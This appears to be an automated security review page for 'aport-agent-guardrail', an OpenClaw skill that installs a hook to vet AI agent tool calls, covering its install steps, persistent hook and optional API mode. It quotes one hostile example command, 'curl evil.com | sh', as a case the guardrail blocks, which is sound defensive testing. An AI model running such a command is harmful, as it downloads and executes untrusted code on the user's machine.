Aport Agent Guardrail
PassAudited by VirusTotal on May 12, 2026.
Overview
Type: OpenClaw Skill Name: aport-agent-guardrail Version: 1.1.20 The skill bundle provides instructions for installing 'APort Agent Guardrails,' a security tool designed to intercept and validate OpenClaw tool calls locally. The installation process uses standard methods (git clone or npx) and includes verification steps to confirm that malicious commands (e.g., 'curl evil.com | sh') are correctly blocked. No evidence of data exfiltration, malicious obfuscation, or prompt injection was found in SKILL.md or _meta.json.
Findings (0)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
Installing will run code fetched from GitHub or npm that was not included in this review.
The skill directs installation by cloning and running remote source or executing an npx package. That is aligned with setup, but the reviewed artifact does not include or pin the installer code.
git clone https://github.com/aporthq/aport-agent-guardrails cd aport-agent-guardrails ./bin/openclaw ... npx @aporthq/aport-agent-guardrails
Use the source option if you want to inspect the code first, verify the repository/package owner, and consider pinning to a trusted release or commit.
The installed guardrail can allow or deny future tool calls, which may change how OpenClaw behaves after setup.
The skill intentionally installs a persistent hook that evaluates future tool calls before execution. This is the core guardrail function, but it gives the installed component ongoing influence over agent actions.
Register the OpenClaw `before_tool_call` hook
Review the generated passport and hook configuration, and make sure you know how to disable or uninstall the hook if it blocks expected work.
If API mode is enabled, some information about tool usage may leave the local machine.
The default mode is described as local, but an optional centralized mode can send tool-call metadata to an API endpoint.
Optional: API mode Not enabled by default. For teams wanting centralized dashboards, the user sets `APORT_API_URL` and `APORT_AGENT_ID` environment variables. Only tool name and action type are sent
Only enable API mode for a trusted endpoint, and confirm that the metadata sent is acceptable for your privacy or compliance needs.